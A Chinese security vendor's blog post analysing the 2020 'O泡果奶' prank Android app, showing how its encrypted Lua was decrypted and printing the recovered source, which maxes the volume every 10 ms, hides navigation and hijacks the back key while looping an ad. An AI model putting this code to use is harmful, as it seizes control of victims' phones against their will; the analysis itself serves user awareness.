网盾安全 - 服务器租用、高防IP、云WAf等

值得信赖的互联网安全服务商,最新动态、新的产品促销活动分享,网络安全动态!

细谈“O泡果奶”事件

发布时间:2020-11-30 14:18:38      来源: 网盾      作者: 夶夏
10月14日左右O泡果奶声音似乎出现全国高校课堂上,它有一个魔性的文件名字叫一份礼物.apk,但是只要发一旦受害者接受安装后,打开就会立马大声播放o泡果奶的洗脑广告。
该事件在知乎热搜榜竟然排到第10名。

我们在此事件基础上延伸几点分析:

1.安全分析

一、反编译

使用apktool box对软件进行反编译后得到如下文件

二、源码解密

通过分析AndroidManifest.xml可以没发现什么明显恶意内容

 assets目录下存放了一个软件核心文件


 
打开main.lua文件时会乱码,因为作者在开发时对lua进行加密,需要两次解密才能拿到源码。
第一次解密完还是乱码状态。
第二次使用 LuadcGUI进行再次解密
 

源码分析

 源码注释分析

require("import")

import("android.app.*")

import("android.os.*")

import("android.widget.*")

import("android.view.*")

import("android.view.View")

import("android.content.Context")

import("android.media.MediaPlayer")   //播放器

import("android.media.AudioManager") //音量控制模块

import("com.androlua.Ticker")        //定时触发

activity.getSystemService(Context.AUDIO_SERVICE).setStreamVolume(AudioManager.STREAM_MUSIC, 15, AudioManager.FLAG_SHOW_UI)

activity.getDecorView().setSystemUiVisibility(View.SYSTEM_UI_FLAG_HIDE_NAVIGATION | View.SYSTEM_UI_FLAG_IMMERSIVE)

m = MediaPlayer()

m.reset()

m.setDataSource(activity.getLuaDir() .. "/mc.mp3")  //加载mc.mp3因为文件(O泡果奶音乐)

m.prepare()

m.start()

m.setLooping(true)

ti = Ticker()  

ti.Period = 10  //间隔10ms触发

function ti.onTick()

  activity.getSystemService(Context.AUDIO_SERVICE).setStreamVolume(AudioManager.STREAM_MUSIC, 15, AudioManager.FLAG_SHOW_UI)

  activity.getDecorView().setSystemUiVisibility(View.SYSTEM_UI_FLAG_HIDE_NAVIGATION | View.SYSTEM_UI_FLAG_IMMERSIVE)

end

ti.start()

function onKeyDown(A0_0, A1_1)    //劫持按键

  if string.find(tostring(A1_1), "KEYCODE_BACK") ~= nil then   //劫持返回按键

    activity.getSystemService(Context.AUDIO_SERVICE).setStreamVolume(AudioManager.STREAM_MUSIC, 15, AudioManager.FLAG_SHOW_UI)    //声音调大最大

  end

  return true

end

通过以上分析可以看出软件安装打开后,只要程序不退出就会一直播放O泡因为,关机键失灵、减音量键也失灵。

 

安全小提示

1、不清楚来路的软件不要装

2、软件安装到正规软件商城安装

3、提醒大家保护个人信息,不点、不传播不知名链接。

 

 

加入网盾,开启安全防护

网盾安全 高防服务器、游戏盾、DDoS高防IP、云WAF等多款安全产品

立即体验